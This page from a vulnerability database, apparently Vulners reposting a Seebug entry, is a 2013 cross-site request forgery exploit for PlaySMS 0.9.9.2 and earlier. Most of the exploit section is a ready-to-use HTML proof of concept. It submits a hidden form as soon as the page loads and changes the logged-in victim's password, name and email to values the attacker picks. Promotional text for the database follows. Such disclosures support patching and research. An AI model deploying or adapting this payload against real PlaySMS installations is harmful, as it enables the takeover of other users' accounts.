Lucene search
K

PlaySMS <= 0.9.9.2 - CSRF

🗓️ 01 Jul 2014 00:00:00Reported by RootType 
seebug
 seebug
🔗 www.seebug.org👁 17 Views

PlaySMS CSRF vulnerability - User data manipulatio

Code

                                                # Exploit Title  : PlaySMS &#60;= 0.9.9.2 CSRF
# Date           : 2013/12/9
# Exploit Author : Saadat Ullah ? [email protected]
# Software Link  : http://playsms.org/
# Author HomePage: http://security-geeks.blogspot.com/
# Tested on: Server : Apache/2.2.15 PHP/5.3.3

# Cross-site request forgery

Playsms is an open source SMS managment system , suffers from Cross-site request forgery through which attacker can manipulate user data via sending him malicious craft url.

Playsms is not using any security token to prevent it against CSRF.You can manipulate any userdata.
PoC and Exploit to change user password:

&#60;html&#62;
 &#60;body onload=&#34;javascript:document.forms[0].submit()&#34;&#62;
&#60;form  name=&#34;ex&#34;action=&#34;http://localhost/playsms/web/index.php?app=menu&inc=user_pref&op=user_pref_save&#34; method=post enctype=&#34;multipart/form-data&#34;&#62;

		
			&#60;input type=hidden size=30 maxlength=30 name=up_password value=&#34;admin&#34;&#62;
		
			&#60;input type=hidden size=30 maxlength=30 name=up_password_conf value=&#34;admin&#34;&#62;
		
			&#60;input type=hidden size=30 maxlength=100 name=up_name value=&#34;admin&#34;&#62;
		
	
			&#60;input type=hidden size=30 maxlength=30 name=up_email value=&#34;[email protected]&#34;&#62;



			&#60;td&#62;&#60;input type=hidden size=30 maxlength=250 name=up_address value=&#34;&#34;&#62;&#60;/td&#62;
	
			&#60;td&#62;&#60;input type=hidden size=30 maxlength=100 name=up_city value=&#34;&#34;&#62;&#60;/td&#62;

			&#60;td&#62;&#60;input type=hidden size=30 maxlength=100 name=up_state value=&#34;&#34;&#62;&#60;/td&#62;
		
			
			&#60;td&#62;&#60;input type=hidden size=10 maxlength=10 name=up_zipcode value=&#34;&#34;&#62;&#60;/td&#62;
	

&#60;input type=submit class=button value=&#39;Save&#39;&#62; 
&#60;/form&#62;
&#60;/html&#62;

#Independent Pakistani Security Researcher
                              

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

01 Jul 2014 00:00Current
7.1High risk
Vulners AI Score7.1
17